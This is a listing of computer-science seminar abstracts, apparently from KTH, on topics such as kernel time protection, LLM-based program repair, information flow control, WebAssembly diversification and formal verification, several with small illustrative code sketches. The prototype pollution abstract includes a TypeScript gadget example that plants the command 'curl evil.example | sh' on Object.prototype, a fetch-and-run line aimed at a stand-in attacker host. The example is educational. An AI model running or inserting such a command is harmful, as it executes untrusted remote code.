In this seminar, we explain how timing side-channels threaten the security of separation kernels, and how we can mitigate these threats using time protection. We discuss what is required of the kernel's design and implementation for effective time protection. We then present a minimal separation kernel for resource-constrained embedded devices that uses the temporal fence instruction (designed for application-grade systems) to implement time protection. We demonstrate that this kernel can effectively mitigate timing side-channels, improve the time predictability of a system, and have an acceptable impact on performance. Finally, we present the design of a more advanced multicore separation kernel with dynamically configurable partitioning and time protection.
Ehsan Poorhadi (KTH) | 08:30 in Room 4423
Over recent years, the number and scale of cyberattacks on safety-critical systems have grown rapidly. This has raised serious concerns over the safety of critical infrastructures such as railway signaling systems. Formal modeling and verification are often used to verify the safety of railway signaling systems, and industry practitioners are now willing to utilize and extend this expertise to reason about safety in the presence of cyber threats. This motivated our research on integrating safety and security modeling to analyze how cyberattacks could jeopardize system safety. In this talk, we introduce an integrated approach that combines modeling in SysML and Event-B to support a rigorous analysis of the impact of cyberattacks on system safety. Our approach allows designers to model the system in SysML and then automatically translate it into Event-B, which formally supports the process of identifying safety requirements that are violated by cyberattacks. The safety requirements are formalized as model invariants, and the violated requirements are identified via the failed invariant-preservation proof obligations. Such an analysis serves as a basis for a consecutive security analysis aiming to define security control mechanisms and prioritize their implementation. Finally, we have applied this approach to several case studies, including the Hybrid Level 3 signaling system – the most mature implementation of the ERTMS standard for automatic train protection.
André Silva (KTH) | 11:00 in Room 4523 and https://kth-se.zoom.us/j/7606930890
Automated Program Repair (APR) has evolved significantly with the advent of Large Language Models (LLMs). Fine-tuning LLMs for program repair is a recent avenue of research, with many dimensions that have not been explored. Existing work mostly fine-tunes LLMs with naive code representations and is fundamentally limited in its ability to fine-tune larger LLMs. To address this problem, we propose RepairLLaMA, a novel program repair approach that combines 1) code representations for APR and 2) LoRA, the state-of-the-art parameter-efficient LLM fine-tuning technique. This results in RepairLLaMA producing a highly effective "program repair adapter" for fixing bugs with language models. Our experiments demonstrate the validity of both concepts. First, fine-tuning adapters with program repair-specific code representations enables the model to use meaningful repair signals. Second, parameter-efficient fine-tuning helps the fine-tuning converge and contributes to the effectiveness of the repair adapter in fixing data points outside the fine-tuning data distribution. Overall, RepairLLaMA correctly fixes 125 Defects4J v2 bugs and 82 HumanEval-Java bugs, outperforming all baselines.
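For reference, the standard LoRA formulation that RepairLLaMA builds on freezes the pretrained weight matrix and trains only a low-rank additive update:

```latex
% Standard LoRA formulation: the pretrained weight matrix W_0 is
% frozen; only the low-rank factors B and A are trained, with rank r
% far smaller than the matrix dimensions d and k.
h = W_0 x + \Delta W\, x = W_0 x + B A\, x,
\qquad B \in \mathbb{R}^{d \times r},\;
       A \in \mathbb{R}^{r \times k},\;
       r \ll \min(d, k)
```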
Deepika Tiwari (KTH) | 10:00 in Fantum and https://kth-se.zoom.us/j/5279673473
For software systems to be reliable, they need to be tested. The responsibility of testing lies with the developers who create and maintain the system, based on their understanding of it. However, the system may deviate from these assumed behaviors when it executes in production scenarios, as a result of the interactions made by end users. We hypothesize that insights from the production behavior of an application can be used to augment its test suite, and complement developer-written tests. In my 80% seminar, I will present how observations made from executing systems can be leveraged to automatically generate tests. We will first look at Pankti, an approach that captures production states and uses them to generate regression tests that contain explicit oracles to verify production behaviors. The second contribution we will discuss is RICK, an approach for automatically generating tests that replace external objects with mocks, stub the behavior of these mocks, and verify distinct aspects of production behaviors through mock-based oracles.
Amir Ahmadian (KTH) | 11:00 in Room 1440 and https://kth-se.zoom.us/j/5089122904
Software security is imperative in today's world, as our reliance on technology continues to grow. In this seminar we are going to look at software security through the lens of language-based security and information flow control. We focus on defining and enforcing realistic security policies in the presence of various real-world attacker models, and investigate their effect on the security of software systems. For the main part of this presentation, I will focus on my research on disjunctive security policies. In this section, I provide an overview of the lattice structure proposed to define disjunctive security policies, discuss our extensions that make it suitable for database-backed programs, and propose a provably-sound static enforcement mechanism to verify that a database-backed program is in line with a disjunctive policy. Next, I will provide an overview of my ongoing research on the security of P4 programs. This will include a brief introduction to the P4 programming language and its applications, a discussion of the challenges of enforcing information flow control policies on P4 programs, and an overview of our proposed enforcement mechanism, which relies on security type systems and abstract interpretation.
Mikhail Shcherbakov (KTH) | 13:00 in Room 1440
Researchers and developers have been aware of code reuse attacks for decades, utilizing techniques such as Return-Oriented Programming (ROP) and Jump-Oriented Programming (JOP). These methods exploit "gadgets" – small sequences of code already present within an application – to achieve Arbitrary Code Execution (ACE) by leveraging memory corruption vulnerabilities in languages like C and C++. Memory-managed platforms, including the JVM, .NET, and JavaScript, offer protections against such memory corruption bugs, raising questions about what primitives within these managed runtimes could lead to ACE.
In this seminar, we explore the code-reuse primitives in the JavaScript language that attackers can exploit to achieve Remote Code Execution (RCE). Our primary concern is prototype pollution, a class of vulnerabilities that enables the exploitation of code reuse attacks. We adopt a comprehensive approach to this issue, starting from the identification of prototype pollution vulnerabilities to the detection of gadgets, with the ambitious goal of discovering end-to-end exploits. We discuss various aspects of these attacks, including code patterns of prototype pollution, methodologies for their static detection, associated gadgets in Node.js and Deno server-side JavaScript runtimes, and both static and dynamic approaches, including developed tools, for gadget detection. Furthermore, we explore end-to-end exploits that demonstrate how prototype pollution can lead to RCE in widely-used open-source applications. This seminar aims to provide an understanding of prototype pollution vulnerabilities, their exploitation mechanisms, and best practices for mitigating such threats.
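To make the notion of a gadget concrete, here is a minimal sketch (my own illustration, not a gadget from the presented work): code that reads an absent option falls through to Object.prototype, so a polluted property silently redirects a sensitive operation.

```typescript
// Illustrative gadget sketch: a function that reads an absent option
// falls through to Object.prototype, so a property polluted elsewhere
// in the application changes its behavior.
interface ExecOptions { cmd?: string }

function runTask(opts: ExecOptions): string {
  // Falls back to a "default" that the prototype chain can supply:
  const cmd = opts.cmd ?? (opts as any).defaultCmd ?? "noop";
  return `would execute: ${cmd}`; // stand-in for a dangerous sink
}

console.log(runTask({})); // "would execute: noop"

// Prototype pollution elsewhere (e.g. via an unsafe merge of attacker
// input) plants the fallback on Object.prototype:
(Object.prototype as any).defaultCmd = "curl evil.example | sh";

console.log(runTask({})); // "would execute: curl evil.example | sh"
```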
Khashayar Etemadi (KTH) | 10:00 in Room 4523
Automated program repair (APR) is all about searching for a patch that fixes a given bug. This is performed in two steps: first, exploring the repair search space to obtain a large and diverse set of repair patches; second, analyzing the discovered patches to identify the ones that are likely to actually fix the bug. In this presentation, we discuss both of these steps: efficient exploration of repair search spaces and effective analysis of repair patches. We show how template-based and large language model-based APR tools can be used to find a large and diverse set of plausible patches. We also present how the differences and similarities between patches can be identified.
Ioana Bercea (KTH) | 10:30 in Room 1537 and Zoom
We will talk about ways in which locality is employed in the design of data structures. We will focus on dictionaries, which maintain sets under insertions and deletions and support membership queries of the form “is an element x in the set?”. We will discuss how state-of-the-art techniques for dictionaries exploit locality in the word RAM model to obtain space and time gains and also how locality is exploited in the choice of hash functions employed for the design.
Boel Nelson (Aarhus) | 11:00 in Room 1440 and https://kth-se.zoom.us/j/62761627532
Confidentiality of metadata is a challenging privacy problem. Most systems today ensure confidentiality of data using encryption, but they do not address confidentiality of metadata. For example, encrypted data still leaks metadata such as when a message is sent, how long it is, and to whom it is addressed. While metadata privacy is a known problem, existing solutions are far from perfect: they are either resource-intensive, which hurts performance, or they guarantee only weak notions of privacy.
In this talk I present the problem of transport layer privacy, and outline a novel formalization of the problem using information flow control techniques that introduces a new trade-off between performance and privacy for anonymous communication. To exemplify, I present a provably private protocol for instant messaging, which we call Deniable Instant Messaging, or DenIM for short.
Joint work in progress with E. Pagnin and A. Askarov.
Aravind Ashok Nair (KTH) | 14:00 in Room 1440 and https://kth-se.zoom.us/my/aanair.kth
Graph structures are ubiquitous and help us to understand many complex real-world applications. Graph Machine Learning (GML) is a branch of computer science that aims to understand a graph's hidden relations and structure and use them to provide powerful graph models for prediction, clustering, and classification tasks. Graphs are also capable of explaining complex behavior by analyzing graph models at the macro level or by studying the interaction of nodes and edges at the micro level. The theme of this seminar is to learn and understand the global and local behavioral properties of complex systems by modeling their graph structure. To achieve this, we investigate the graph structures of complex systems in two real-world domains - (i) Software Testing in Software Engineering and (ii) Cell Graph Modeling in Digital Pathology.
For tasks in the software testing domain, we use control flow graphs (CFGs) for understanding global behavioral properties such as (i) reverse engineering software requirements (metamorphic relations) and (ii) estimating code similarity. In the area of digital pathology, we generate cell graphs from digitized medical tissue images, where each node represents a cell nucleus and edges represent the spatial relationship between two cell nuclei. Cell-graphs can be used to understand tissue structure and function in histology.
In this seminar, we show that both global and local behavioral properties of complex systems can be modeled from their graph structure using GML techniques. However, to achieve higher performance, it is critical to consider relevant attributes, embeddings, topologies, and architectures.
Javier Cabrera (KTH) | 10:00 in Fantum Room and https://kth-se.zoom.us/j/64627724629
Since its 2015 inception, WebAssembly (Wasm) has experienced swift integration, with languages such as Rust and C/C++ now compiled to Wasm and compatible with all major browsers. Crucially, Wasm's adoption extends beyond browsers, with platforms like Fastly and Cloudflare incorporating it into their core services. However, vulnerabilities have been detected in Wasm's implementations, both in browsers and standalone runtimes, mostly due to software monoculture.
Our work explores software diversification as a proactive solution to address these vulnerabilities. We generate hundreds of variants that share functionality, while exhibiting diverse execution behaviors. This presentation outlines four contributions in this area.
First, we discuss CROW, a superdiversification engine for Wasm implemented within the LLVM compilation pipeline. Second, we introduce MEWE, which embeds multiple variants into a single program, supporting runtime randomization; MEWE has been evaluated on a worldwide content delivery network. Third, considering the evolving landscape of Wasm tools and the introduction of new compilers outputting Wasm binaries via non-LLVM methodologies, we unveil a Wasm-to-Wasm diversification solution, wasm-mutate, and demonstrate how it can be used to prevent Spectre attacks on WebAssembly programs. Finally, we demonstrate how commercial solutions are inaccurate in detecting Wasm cryptomalware variants, and how diversification can be used to rectify this.
Jesper Amilon (KTH) | 13:15 in Room 4523 and https://kth-se.zoom.us/j/62505868883
Within embedded systems software, correctness relies mainly on testing techniques. While testing may serve well as a bug-catcher, it cannot be used to formally prove the absence of bugs. For this, an exhaustive method, i.e., formal verification, is required. However, the cost and level of skill needed for formal verification mean that it is often overlooked by industry. Furthermore, several common software aspects, a prominent one being floating-point arithmetic, are not well supported by state-of-the-art tools. In this seminar, we present our work on formal verification of embedded-systems software at the Swedish heavy-vehicle manufacturer Scania, where we focus on automating the verification process to allow for easier integration of formal verification into the development chain. To this end, we present work on the automated verification of properties of C arrays. We will also discuss an approach for combining deductive verification and model checking. Lastly, we outline future research plans, including in particular the verification of C programs with floating-point arithmetic.
Han Fu | 13:00 in Room 4523 and https://kth-se.zoom.us/j/6236541995
Automated continuous integration (CI) process faults can severely impact industrial code development. We investigated CI failures in four large industrial projects to enhance efficiency, reliability, and maintainability. Analyzing 11,731 builds over six months, we identified 1,414 failing builds and found that compilation errors accounted for 47% of failures, followed by testing at 36%. We also discovered 14 distinct types of testing failures and highlighted configuration problems as significant issues. To delve deeper, we utilized the "Shadow Job" CI diagnostics solution, examining 40,000 commits and categorizing compiler errors into 14 types. The five most common errors comprised 89% of all compiler errors. Our study also explored the localizability and repairability of errors, revealing their independence from resolution time, size, and distance. Furthermore, we provided insights into the human effort required to fix common compilation errors, suggesting a prioritization strategy based on error frequency and repair effort.
Our future focus is reducing failing tests and compilation errors caused by configuration and dependency problems. We will first aim to implement automatic fault localization and program repair techniques to address compilation errors resulting from configuration and dependency issues. Enhancing our "Shadow Job" implementation, we plan to develop automated solutions for error resolution, leveraging advanced techniques like neural networks and large language models. Furthermore, we will expand our study to include additional projects and companies to validate our findings and ensure broader applicability.
Amir Ahmadian (KTH) | 13:00 in Room 1537 and https://kth-se.zoom.us/j/5089122904
Our world today heavily relies on software systems. They are used in almost every aspect of our society, and thus securing them is a crucial task. Numerous factors influence the security of a program in a particular setting, including the interplay between the program's building components, the unique threats present in that setting, and the relevant attacker models and security policies.
In this seminar I will be presenting my research on the security of software systems under real-world policies and attacker models.
In the first part of the presentation, I will provide an overview of my research on dynamic policies and the effects of changing the security policy during the execution of a program. I will discuss different attacker models and investigate their effects on our definition of security. Next, I will provide an overview of my research on the security of programs executed on trusted execution environments (TEE). The security guarantees of a TEE, relevant attacker capabilities, and their effect on the security of the programs are discussed in this part.
In the second part of the presentation, I will be discussing my research on disjunctive policies in database-backed programs. I will explore models to understand the semantics of disjunctive security policies in database-backed programs, and propose a provably-sound static enforcement mechanism to check these disjunctive policies.
Prof. David Sands from Chalmers (https://www.cse.chalmers.se/~dave) will be joining the seminar as the discussion leader.
Virgil Gligor (CMU) | 16:00 in Room 4523 and https://kth-se.zoom.us/j/6529956822
Suppose that a trustworthy program must be booted on a commodity system that may contain persistent malware in the firmware of its device controllers. Establishing software root of trust (RoT) assures that the system’s firmware has all and only the content chosen by a trusted external verifier, or the verifier discovers unaccounted content, with high probability. Hence, RoT establishment assures that trustworthy program boot can take place in a malware-free firmware state. This is challenging because device controller malware can survive in system states across repeated secure- and trusted-boot operations and act on behalf of a powerful remote adversary. Furthermore, anti-malware tools do not have malware-unmediated access to device controllers’ firmware and thus must interact with device controllers as with any "black box"; e.g., attempts to re-flash black-box firmware offer no guarantee of malware erasure, nor do they prevent malware connections over the internet. In this presentation, I will illustrate both the theoretical and practical challenges of establishing RoT unconditionally, i.e., without secrets, privileged modules (e.g., TPMs, RoMs, HSMs), or bounds on the adversary's computation. The proposed approach offers the only unconditional solution known in security or cryptography to date.
Mojtaba Eshghie (KTH) | 13:00 in Room 1440 and https://kth-se.zoom.us/j/7998785238
Smart contracts manage blockchain assets. While smart contracts embody business processes, their platforms could be more process-aware. Mainstream smart contract programming languages such as Solidity do not have explicit notions of roles, action dependencies, and time. Instead, these concepts are implemented in program code. This makes it very hard to design and analyze smart contracts. We argue that DCR graphs are a suitable formalization tool for smart contracts because they explicitly and visually capture these features. We utilize this expressiveness to show that many common high-level design patterns in smart-contract applications can be naturally modeled this way. Applying these patterns shows that DCR graphs facilitate the development and analysis of correct and reliable smart contracts by providing a clear and easy-to-understand specification. We will also discuss the use of these designs for monitoring smart contracts.
Shravan Narayan (UT Austin) | 16:30 in Zoom
Most systems we use today are wildly insecure. This past year attackers have exploited bugs in systems like browsers and operating systems to steal user data, shut down hospitals, and stalk activists. Attackers are winning because bugs in a seemingly unimportant component like the browser's spell-checker can be used to compromise the entire browser.
In this talk, I will describe my work retrofitting existing systems towards secure design. First, I will describe RLBox, a type-driven sandboxing framework that ships in the Firefox browser. RLBox helps Firefox engineers retrofit the browser to sandbox third-party libraries and safeguard its users from attacks that exploit vulnerabilities in these libraries. Then I will describe my work on the VeriWasm analysis tool and the Swivel compiler, which together secure edge-cloud platforms against attacks that exploit compiler bugs and micro-architectural vulnerabilities like Spectre. Along the way, I will describe the challenges and research questions that only arise when trying to deploy principled techniques (e.g., from programming languages and system design) to secure huge systems like Firefox.
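For a flavor of the type-driven idea (RLBox itself is a C++ library; this Python rendering is only a sketch with invented names), data returned from a sandboxed library stays "tainted" until the host explicitly validates it:

    # Rough Python rendering of the tainted-value pattern; not RLBox's API.
    class Tainted:
        def __init__(self, value):
            self._value = value  # never exposed directly

        def copy_and_verify(self, check):
            # The host supplies a validator; only checked data escapes.
            v = self._value
            if not check(v):
                raise ValueError("sandbox returned unexpected data")
            return v

    def sandboxed_spellcheck(word: str) -> Tainted:
        # Stand-in for a call into a sandboxed third-party library.
        return Tainted(len(word) > 2)

    result = sandboxed_spellcheck("hello")
    ok = result.copy_and_verify(lambda v: isinstance(v, bool))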
Camilla Björn (KTH) | 13:15 in Room 4523 and https://kth-se.zoom.us/j/64269201723
Progression is an established and important concept in curriculum development for professional education programmes. But despite its frequent usage, it is surprisingly unclear what it means in this context and how it can be utilised to optimise the fulfilment of the programme learning outcomes. There are several interpretations of the concept, such as viewing progression as programme retention or course completion, or as the constructive alignment between courses. However, there are other ways of viewing progression in professional education, and there are also different aspects of progression to focus on when considering the constructive alignment between courses, such as increased scope (the depth and breadth of knowledge), increased ability to apply knowledge and skills in practice, and increased proficiency in different skills.
In this 30% seminar, Camilla will present the research plan for her PhD project, which focuses on conceptualising progression in professional education with an emphasis on computer science education. Her project consists of four subprojects, which will be explained in detail during the seminar, including the work that is already completed.
Javier Ron (KTH) | 16:30 in Room 1440 and https://kth-se.zoom.us/j/66050844902
Like all software, blockchain nodes are exposed to faults in their underlying execution stack. Unstable execution environments can disrupt the availability of blockchain nodes' interfaces, resulting in downtime for users. This paper introduces the concept of N-version blockchain nodes. This new type of node relies on the simultaneous execution of different implementations of the same blockchain protocol, in line with Avizienis’ N-version programming vision. We design and implement an N-version blockchain node prototype in the context of Ethereum, called N-ETH. We show that N-ETH is able to mitigate the effects of unstable execution environments and significantly enhance availability under environment faults. To simulate unstable execution environments, we perform fault injection at the system-call level.
Our results show that existing Ethereum node implementations behave asymmetrically under identical instability scenarios. N-ETH leverages this asymmetric behavior across the diverse implementations of Ethereum nodes to provide increased availability, even under our most aggressive fault-injection strategies. We are the first to validate the relevance of N-version design in the domain of blockchain infrastructure. From an industrial perspective, our results are of utmost importance for businesses operating blockchain nodes.
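As a rough sketch of the N-version idea (not the N-ETH implementation; the endpoints and dispatch policy here are placeholders), the same JSON-RPC request can be fanned out to several independent client implementations so that a crashed or degraded instance is simply masked:

    # Illustrative only; uses the third-party 'requests' package.
    import concurrent.futures, requests

    ENDPOINTS = [
        "http://geth:8545",        # hypothetical geth instance
        "http://nethermind:8545",  # hypothetical nethermind instance
        "http://besu:8545",        # hypothetical besu instance
    ]

    def rpc(endpoint, method, params):
        r = requests.post(endpoint, json={
            "jsonrpc": "2.0", "id": 1, "method": method, "params": list(params),
        }, timeout=2)
        r.raise_for_status()
        return r.json()["result"]

    def n_version_call(method, params=()):
        with concurrent.futures.ThreadPoolExecutor() as pool:
            futures = [pool.submit(rpc, e, method, params) for e in ENDPOINTS]
            for f in concurrent.futures.as_completed(futures):
                try:
                    return f.result()   # first healthy implementation wins
                except Exception:
                    continue            # a faulty version is masked
        raise RuntimeError("all versions failed")

    # n_version_call("eth_blockNumber")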
Jimmy Koppel | 13:30 in Room 1440 and https://kth-se.zoom.us/j/63233589327
Programming languages researchers have developed many advanced tools that promise to greatly ease software engineering. Yet even conceptually simple tools are expensive to implement fully due to the complexity of the target language, and standard techniques tie an implementation to a particular target language. In order to make the development of advanced programming tools economical, these problems demand new techniques for decomposing the development of tools and automating portions of their construction, which I collectively dub “meta-metaprogramming.”
In this talk, I will present my work on new techniques and frameworks for making tools easier to build and more general, as well as tools built on them. First, I will present Cubix, a "One Tool, Many Languages" framework that allows a single tool to be quickly written for multiple programming languages. We have used Cubix to build Yogo, a semantic search tool capable of finding equivalent patterns in C, Java, and Python from a single shared query. Second, I will present Mandate, the world's first control-flow-graph generator generator, able to generate multiple varieties of CFG generator given a programming language's formal semantics. Finally, I will present our ongoing work on ECTAs (equality-constrained tree automata), a new kind of data structure/constraint solver able to efficiently search large spaces of programs subject to certain constraints. We have used ECTAs to build two synthesizers for Haskell, Hectare and Spectacular, which solidly beat their pre-existing competitors (Hoogle+ and QuickSpec) with only a fraction of the engineering effort.
Christian Lidström (KTH) | 13:15 in Room 1440 and https://kth-se.zoom.us/j/2440183377
In this seminar I will present the outline of my thesis, and describe the published and planned papers to be included. The focus of the thesis is automated verification of embedded software, and in the talk I will also briefly discuss the details of the work performed to this end. Today, embedded systems are increasingly large and complex, and in many cases of a safety-critical nature, as is the case in, for example, the automotive industry. For this reason, traditional methods of ensuring correctness, such as testing, may be insufficient. On the other hand, formal methods, such as deductive verification, are largely considered prohibitively expensive in industry, because of the amount of expertise and manual work required. To deal with this, we have first developed a formal framework for compositionally designing embedded systems, with a focus on procedural software components, where high-level system properties can be decomposed into lower-level software properties and then formally verified. Second, we have developed techniques to automate the low-level software verification, focusing on automatic inference of function contracts for use in deductive verification, as well as on combining deductive verification with other techniques.
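For illustration, a function contract pairs a precondition with a postcondition. The toy below renders one as runtime assertions, whereas deductive verification would discharge the same obligations statically; this is a sketch, not the framework from the talk:

    # Invented decorator for illustration; real contracts would be, e.g.,
    # ACSL annotations checked by a verifier, not runtime assertions.
    def contract(pre, post):
        def wrap(f):
            def g(*args):
                assert pre(*args), "precondition violated"
                result = f(*args)
                assert post(result, *args), "postcondition violated"
                return result
            return g
        return wrap

    @contract(pre=lambda xs: len(xs) > 0,
              post=lambda r, xs: r in xs and all(r >= x for x in xs))
    def max_of(xs):
        m = xs[0]
        for x in xs[1:]:
            if x > m:
                m = x
        return m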
Marcus Schmidt Birgersson (KTH) | 11:00 in Room 1440 and https://kth-se.zoom.us/j/6256056515
Smart devices, so-called IoT devices, produce a lot of data of various kinds. These devices are in general limited both in terms of storage and processing power. This means that the data is in most cases transported to the cloud, where it can be both stored and analyzed. To protect data stored in the cloud, while still being able to perform arbitrary computations on it, we present a system for secure multiparty computation by means of trusted execution environments. Principals store encrypted data in a middleware located in the cloud and provide access to a subset of this data to a trusted execution platform provided by some party that needs an aggregation of this data, the receiver. This access is given by the principals by providing the TEE with the decryption keys. By means of remote attestation, the principals can verify that the correct computation will be carried out. Our system allows for evaluating any computation over mutually distrusting principals' data without any complex secret-sharing schema. Users can be added and removed at any time, and no user needs to be online and active at the time of computation. For our system to work in a secure and confidential way, we assume that the middleware that stores the data does not cooperate with the receiver. If they do cooperate, this places extra requirements on the aggregation function in order to prevent such attacks. Potential solutions involve tools from differential privacy or statistics in general. I will end the talk by reasoning about how we can use this to further improve the security guarantees of our system.
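To make the flow concrete, here is a minimal toy of the protocol shape, with a stubbed attestation check and invented names (a real deployment verifies a hardware attestation quote; this is not the presented system):

    # Requires the third-party 'cryptography' package.
    from cryptography.fernet import Fernet

    class Middleware:            # cloud store; sees only ciphertexts
        def __init__(self): self.blobs = {}
        def put(self, pid, blob): self.blobs[pid] = blob
        def get(self, pid): return self.blobs[pid]

    class Enclave:               # stand-in for the TEE
        def __init__(self): self.keys = {}
        def quote(self): return "MEASUREMENT"   # stub for remote attestation
        def receive_key(self, pid, key): self.keys[pid] = key
        def aggregate(self, middleware, pids):
            values = [int(Fernet(self.keys[p]).decrypt(middleware.get(p)))
                      for p in pids]
            return sum(values) / len(values)    # only the aggregate leaves

    mw, tee = Middleware(), Enclave()
    keys = {p: Fernet.generate_key() for p in ("alice", "bob")}
    mw.put("alice", Fernet(keys["alice"]).encrypt(b"41"))
    mw.put("bob", Fernet(keys["bob"]).encrypt(b"43"))
    for p, k in keys.items():
        assert tee.quote() == "MEASUREMENT"  # verify before releasing the key
        tee.receive_key(p, k)
    print(tee.aggregate(mw, ["alice", "bob"]))  # 42.0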
Zimin Chen (KTH) | 10:30 in Room 4523 and https://kth-se.zoom.us/j/69265621933
Machine learning techniques are increasingly being applied to software engineering tasks such as program generation and repair. However, the design of effective input and output representations is a critical aspect of these models, since the size of the input and output of any machine learning model is subject to memory and computation constraints. In this presentation, we will discuss our recent research papers, which propose novel approaches for designing the input and output representations of machine learning models for software engineering.
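As a toy illustration of why representation design matters (invented, not one of the papers' encodings), consider fitting a buggy line plus surrounding context into a fixed-size input window; the representation decides what survives truncation:

    MAX_TOKENS = 16  # stand-in for a model's context limit

    def encode(buggy_line: str, context: list[str]) -> list[str]:
        tokens = buggy_line.split()
        # Spend the remaining budget on the nearest surrounding context,
        # one line at a time, instead of naively truncating the file head.
        for line in context:
            extra = line.split()
            if len(tokens) + len(extra) > MAX_TOKENS:
                break
            tokens += extra
        return tokens

    print(encode("return a - b",
                 ["def add(a, b):", "# expected: addition"]))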
Joel Gärtner (KTH) | 10:00 in Room 1440 and https://kth-se.zoom.us/j/6293265597
Quantum computers are currently under active development and may soon be capable of solving certain problems that are believed to be infeasible to solve with classical computers. In particular, Shor's algorithm is a famous quantum algorithm that allows a sufficiently powerful quantum computer to break essentially all asymmetric cryptography that is currently being used. Therefore, there is a need for post-quantum secure cryptographic algorithms that are not only secure against classical adversaries but also against those with access to large quantum computers.
Some of the primary candidates for post-quantum cryptography are based on the assumed hardness of variants of the Learning with Errors (LWE) problem. The LWE problem can be seen as a random instance of a special type of lattice problem, and LWE-based cryptosystems are secure if this problem is infeasible to solve. The hardness of the LWE problem is asymptotically supported by a reduction showing that a random LWE instance is hard as long as there exists a hard instance of a standard lattice problem. However, in practice this reduction has not been able to support the security of any concrete cryptosystem. In this talk, I will discuss post-quantum lattice-based cryptography, what reductions may say about the security of typical lattice-based cryptosystems, and how I have been able to parametrize a scheme whose security is actually based on the worst-case hardness of a standard lattice problem.
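For reference, an LWE instance has the following standard shape (the textbook definition, not anything specific to the talk), with secret s and errors drawn from a narrow distribution chi:

    \[
      (a_i,\, b_i) \in \mathbb{Z}_q^n \times \mathbb{Z}_q, \qquad
      b_i = \langle a_i, s \rangle + e_i \bmod q, \qquad
      a_i \leftarrow \mathcal{U}(\mathbb{Z}_q^n),\; e_i \leftarrow \chi,
    \]

and the (search) task is to recover s from the samples (a_i, b_i).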
Ning Dong (KTH) | 13:15 in Room 4523, and https://kth-se.zoom.us/j/5937312883
Computing devices have become an indispensable part of people’s daily life. In order to build a trustworthy stack, both hardware and software must be considered. Accordingly, my research focuses on low-level hardware and software in the computing system, applying formal verification. In this presentation, I will briefly introduce my completed work: formal verification of an I/O device and its driver, and the executable semantics of the MIL (Machine Independent Language) formalization. The first work studied the Serial Peripheral Interface (SPI) and device-to-device information flow. The MIL work is a formal platform for reasoning about the information flow of low-level programs at the microarchitectural level, and for checking information leakage caused by microarchitectural features like out-of-order execution. The executable semantics is used to evaluate the execution of MIL programs and to partially automate the conditional-noninterference proof. The central part of my thesis is a formal approach to verifying in-order pipelined processor circuits. We have developed and verified a pipelined processor in the interactive theorem prover HOL4. I will present the general challenges that pipelines pose and how we handle them in the correctness proof.
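One common way to phrase the correctness of a pipelined implementation against its ISA-level specification is as a commutation property over an abstraction function abs, mapping (flushed) pipeline states to programmer-visible states; the exact formulation used in the thesis may differ:

    \[
      \forall s.\;\; \mathit{abs}(\delta_{\mathrm{impl}}(s))
        \;=\; \delta_{\mathrm{spec}}(\mathit{abs}(s))
    \]

Here delta_impl is the implementation's step function and delta_spec the specification's; proving the equation for all reachable states shows the pipeline refines the ISA.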
Anoud Alshnakat (KTH) | 13:15 in Room 1537 and https://kth-se.zoom.us/my/anoud
The emergence of Software-Defined Networking (SDN) has enabled the programming of network device data planes through specialized languages such as P4. However, this flexibility in programming can result in network correctness issues due to potential errors in P4 programs. Our aim is to provide insights into the formal verification of P4 programs and their potential to enhance the correctness of data planes.
To this end, we have developed HOL4P4, a formalization of P4 semantics using the interactive theorem prover HOL4. This semantics provides a formal foundation for the verification of P4 software. We have also introduced a type system to ensure the progress of P4 programs.
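For context, "progress" here is the standard type-soundness property, stated generically below (the HOL4P4 formulation is mechanized and may differ in detail): a well-typed program is either finished or can take a step.

    \[
      \vdash e : \tau \;\Longrightarrow\;
      e \in \mathit{final} \;\lor\; \exists e'.\; e \longrightarrow e'
    \]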
In this seminar, I will cover the main building blocks of the HOL4P4 semantics and provide illustrative examples. Furthermore, I will present the type system and discuss the challenges faced in its development. Finally, I will discuss our planned work and possible future work, including the obstacles that need to be overcome to develop P4 proof-producing verification tools.
Matthías Páll Gissurarson (Chalmers) | 11:00 in Room 1440 and https://kth-se.zoom.us/j/61671598890
Automatically repairing programs is difficult, especially when the program space we have to search is huge. In this talk, I'll describe how a strongly typed language like Haskell allows us to narrow the search space to a more manageable size; ECTAs, a data structure that allows us to efficiently represent such entangled program spaces; and how these can be used for automatic program repair and test synthesis based on property-based testing.
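As a toy of the type-directed idea (rendered in Python for uniformity with the other sketches on this page; the talk's setting is Haskell, and the candidates below are invented), expressions whose type does not match a hole are discarded before any test is ever run:

    CANDIDATES = [
        ("length",  ("list", "int")),
        ("reverse", ("list", "list")),
        ("sum",     ("list", "int")),
    ]

    def fills_hole(hole_type, candidates):
        # Type-based pruning: only type-correct candidates survive.
        return [name for name, typ in candidates if typ == hole_type]

    # A hole of type list -> int admits only two of the three candidates:
    print(fills_hole(("list", "int"), CANDIDATES))  # ['length', 'sum']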
Mohammad M. Ahmadpanah (Chalmers University of Technology) | 11:00 in Room 4423 and Zoom
Trigger-Action Platforms (TAPs) empower applications for connecting otherwise unconnected devices and services. Current TAPs like IFTTT require trigger services to push excessive amounts of sensitive data to the TAP regardless of whether the data will be used in the app, violating the principle of data minimization. Furthermore, the rich features of modern TAPs, including IFTTT queries to support multiple trigger services and nondeterminism of apps, have been out of the reach of previous data minimization approaches like minTAP. In this talk, I will present LazyTAP, a new paradigm for fine-grained, on-demand data minimization. LazyTAP breaks away from the traditional push-all approach of coarse-grained data over-approximation. Instead, LazyTAP pulls input data on demand, once it is accessed by the app execution. Thanks to the fine granularity, LazyTAP enables tight minimization that naturally generalizes to support multiple trigger services via queries and is robust with respect to nondeterministic behavior of the apps. We achieve seamlessness for third-party app developers by leveraging laziness to defer computation and proxy objects to load necessary remote data on demand and behind the scenes. We formally establish the correctness of LazyTAP and its minimization properties with respect to both IFTTT and minTAP. We implement and evaluate LazyTAP on a mixture of real and synthetic app benchmarks, showing that on average LazyTAP improves minimization by 95% over IFTTT and by 38% over minTAP, while incurring a tolerable performance overhead.
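A rough sketch of the pull-on-demand idea (not LazyTAP's implementation; fetch_field and the field names are hypothetical): trigger data is wrapped in a proxy, and a remote fetch happens only for the fields the app actually touches.

    def fetch_field(service, event_id, field):
        print(f"pulling {field!r} from {service}")   # placeholder fetch
        return f"<{field}>"

    class LazyTrigger:
        def __init__(self, service, event_id):
            self._service, self._event_id = service, event_id
            self._cache = {}

        def __getattr__(self, name):
            # Called only for fields the app actually reads; only then
            # does any data leave the trigger service.
            if name not in self._cache:
                self._cache[name] = fetch_field(self._service,
                                                self._event_id, name)
            return self._cache[name]

    trigger = LazyTrigger("email_service", "evt-1")
    subject = trigger.subject     # pulls just the subject
    # trigger.body is never accessed, so it is never sent to the TAP.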
Romy Tsoupidi | 10:00 in Room 1537 and https://kth-se.zoom.us/j/66518599125
